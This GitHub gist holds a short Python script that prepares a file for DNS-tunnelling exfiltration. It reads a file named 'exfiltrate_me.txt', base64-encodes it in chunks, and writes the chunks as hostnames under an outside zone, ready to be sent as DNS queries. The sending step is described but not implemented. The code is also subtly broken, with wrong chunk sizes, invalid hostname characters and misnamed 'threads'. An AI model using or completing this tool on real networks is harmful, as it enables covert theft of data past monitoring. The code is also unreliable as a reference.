Created
May 10, 2022 12:48
-
-
Save cagingulsen/0d1f1904bad307cd6956c25fab4938a6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import base64 | |
| import struct | |
| import time | |
| import binascii | |
| """ Break a large file into small 96 byte chunks | |
| Sequence the chunks, pack and b64 encode them | |
| Then send DNS queries """ | |
| # If you don't like non-valid characters in the hostname, | |
| # then use hex encoding rather than base64 | |
| DNS_ZONE = "kcgtst.io" | |
| # To randomize encoded data to seem like different | |
| NUMBER_OF_THREADS = 4 | |
| MAX_PART_INDEX = 4 | |
| socket.setdefaulttimeout(1) | |
| def break_file(read_filename, file_index): | |
| try: | |
| with open(read_filename, "rb") as fpr: | |
| with open(f"dns_requests{file_index}.txt", "w") as fpw: | |
| data = fpr.read(file_index) | |
| part = 0 | |
| data_str = "" | |
| while 1: | |
| data = fpr.read(45) | |
| part += 1 | |
| if data: | |
| data_base64 = binascii.b2a_base64(data, newline=False) | |
| data_str = data_str + data_base64.decode() + "." | |
| else: | |
| print(f"Encoding dns requests completed for part {file_index}") | |
| fpw.write(data_str + DNS_ZONE + '\n') | |
| break | |
| if part == MAX_PART_INDEX: | |
| fpw.write(data_str + DNS_ZONE + '\n') | |
| part = 0 | |
| data_str = "" | |
| fpw.close() | |
| fpr.close() | |
| except Exception as e: | |
| print(e) | |
| # Run Program | |
| for idx in range(NUMBER_OF_THREADS): | |
| break_file('exfiltrate_me.txt', idx) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment